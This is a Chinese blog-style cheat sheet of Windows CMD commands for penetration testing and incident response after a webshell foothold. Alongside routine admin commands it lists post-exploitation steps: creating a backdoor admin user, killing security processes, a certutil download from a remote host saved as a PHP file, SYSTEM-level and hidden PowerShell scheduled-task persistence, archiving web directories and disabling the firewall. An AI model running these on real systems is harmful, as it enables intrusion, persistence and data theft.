渗透测试与应急响应常用CMD命令

在web渗透测试过程中,当我们通过某个漏洞利用成功获取到webshell后,下一步便要通过webshell进行提权或打包数据。由于webshell对远程服务器的操控,是通过命令行而非图形化界面实现的,因此,渗透过程中熟悉常用的命令十分有必要,本文总结了一些渗透测试时常用的CMD命令。
————————————————

ipconfig
ipconfig /all #查看当前网卡
ipconfig /release #释放网卡上的ip地址,网卡不禁用
ipconfig /flushdns #刷新DNS解析缓存
ipconfig /renew #更新指定网卡的ipv4地址,用于客户端获取dhcp
ipconfig /displaydns #获取当前主机的dns缓存记录
net
  • net user     #查看当前有哪些用户
net user xiaoming 123456 /add	#添加用户xiaoming,设置密码为123456
net user xiaoming #查看用户xiaoming的信息
net user xiaoming /del #删除用户xiaoming
net user /domain  #判断用户是否是域成员
  • net localgroup #查看当前有哪些组
net localgroup administrators #查看administrators组有哪些成员
net localgroup administrators xiaoming /add #将xiaoming添加到administrators组中
  • net start #查看网络中的服务
net start service_name
net stop service_name
whoami     #查看当前用户名及权限
whoami /user #查看当前用户SID
netstat
netstat -ano #查看当前网络连接情况
netstat -anbv #获取进程名、调用组件的路径
systeminfo     #查看当前计算机版本、架构、补丁等基本信息
msinfo32 #获取详细系统硬件信息、环境变量
start /wait msinfo32.exe /report c:\list.txt /categariesswenv+SWEnvRunningTasks
ver     #查看当前windows版本
tasklist /svc     #查看当前进程的主持服务
taskkill /im /f safe.exe     #强行杀掉safe.exe进程
query user     #查看当前哪些用户在线
logoff 1     #终止会话ID为1的会话
cacls     #显示或修改文件的访问控制列表
dir /ah     #显示具有隐藏属性的文件
del /ah /f autorun.inf     #强制删除具有隐藏属性的文件autorun.inf
attrib -s -r -h autorun.inf     #清除文件的系统s、只读r、隐藏h属性
mstsc /admin /v: 192.168.0.22:3389     #突破远程桌面连接2个用户同时登陆
  • mstsc /console /v:192.168.0.11:3389     #突破远程桌面连接2个用户同时登陆
wmic process > process.txt     #查看所有进程及路径,重定向到process文本文件
sc 命令     #用来服务控制管理器和服务进行通信
sc create servername binpath="c:\test.exe" start=auto displayname="Test Service" #创建一个Test Service的服务
sc start servername #启动服务
sc delet servername #删除服务
sc stop servername #关闭服务
ntbackup命令
ntbackup backckup c:\inetpub\wwwroot /j "my job" /f "c:back.bkf" #使用windows自带命令打包文件
rar命令
rar.exe a -ag -k -r -s -m1 d:\webs\1.rar d:\webs  #把d:\webs\目录下所有内容打包为1.rar放到d:\webs目录下
  • a 添加文件到压缩文件中
  • -k 锁定压缩文件
  • -s 产生固体存档
  • -ag :当创建压缩文件时,以格式“YYYYMMDDHHMMSS”附加当前日期字符串,文件名bakYYYYMMDDHHMMSS.rar;
type命令 #相当于Linux的cat命令,查看文件内容。
certutil命令下载 #功能相当于linux的curl命令
certutil -urlcache -f "http://10.10.10.170/test.txt" a.php
schtasks计划任务命令
schtasks /create /RL HIGHEST /F /RU "SYSTEM" /TN "WindowsS" /TR "C:/test.exe" /SC DAILY /MO 1 /ST 00:00
  • /RL:设置任务的运行级别。有效值为LIMITED和HIGHEST。默认为LIMITED。
  • /F:如果指定的任务已存在,则强制创建任务并禁止警告的值。
  • /RU:指定运行任务的用户上下文。
  • /TN:指定唯一标识计划任务的名称。
  • /TR:指定要在计划的时间运行的任务的路径和文件名。
  • /SC:指定计划频率,DAILY为每天。
  • /MO:对于MINUTE,HOURLY,DAILY,WEEKLY有效,可选参数,默认为1.
  • /ST:指定运行任务的开始时间,格式为HH:mm(24小时制)。

计划任务立即运行某进程

schtasks /run /TN "WindowsS"

使用powershell隐藏运行某进程

schtasks /create /tn "WindowsS" /tr "powershell -windowstyle hidden -command 'python c:\test.py -lp 4444'" /sc onlogon
netsh命令控制防火墙

推荐命令

netsh advfirewall set allprofiles state on

弃用命令,会触发360报警弹窗

C:\Windows\system32>netsh firewall set opmode disable

重要信息: 已成功执行命令。
但是,"netsh firewall" 已弃用;
请改用 "netsh advfirewall firewall" 。
有关使用 "netsh advfirewall firewall" 命令
而非 "netsh firewall" 的详细信息,请参阅
 https://go.microsoft.com/fwlink/?linkid=121488 上的 KB 文章 947709。

确定。
  • 1
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值